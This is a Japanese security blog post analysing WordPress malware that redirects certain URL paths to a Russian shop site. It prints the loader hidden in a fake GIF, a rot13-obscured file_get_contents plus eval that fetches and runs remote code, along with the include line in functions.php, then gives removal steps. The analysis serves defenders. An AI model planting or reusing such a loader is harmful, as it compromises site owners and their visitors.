ワードプレスの一部の階層のURLのみロシアの通販サイトにリダイレクトする新種のマルウェアを発見しましたのでその事例をご紹介いたします。
ワードプレスのマルウェアの特徴
このマルウェアの特徴は、ワードプレスの特定の階層 例えば example.com/en/ や example.com/jp/等以下のページすべてをロシアドメインの不正なサイトにリダイレクトします。
例えば下記のようなサイトが不正なリダイレクト先サイトとなっておりました。
http://www[.]hacopy[.]ru/
マルウェアの所在
このマルウェアは、GIFやJPGに偽装した不正なPHPプログラムで、当社が発見したものはテーマのFunctions.phpに下記のような記載でマルウェアを読み込んでおりました。
include("images/qaI.gif");
このマルウェアの巧妙な点は、マルウェア本体をgifやjpgに含んでおきながら、それを読み込むコードは極めて短く、難読化もされていないため、逆に検出が困難であるというところです。
gifやjpgに偽装したマルウェア本体のコードは下記のようなものでございました。
error_reporting(0);
$a =@file_get_contents(str_rot13('uggc://***********/').'all/*********/xmlr');
eval('?>'.$a);
このコードは外部の不正なコードを引っ張ってきて、サーバー上で実行するものです。これにより不正なリダイレクトを実現していました。
マルウェアの対処方法
このマルウェアには下記のような方法で対処できます。
1不正なgifやjpgの不正なINCLUDE(読み込み)をマルウェアスキャナープラグインで検出します。
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
2不正な読み込みを検出したら、gifやjpgファイルを読み込んでいるサーバー上の所在をパスから読み取り、ftpソフトウェア等でサーバーに接続して、マルウェア本体を削除の上、不正なINCLUDE文を削除します。
(この2点を同時に行わないと、プログラムエラーが発生いたします)
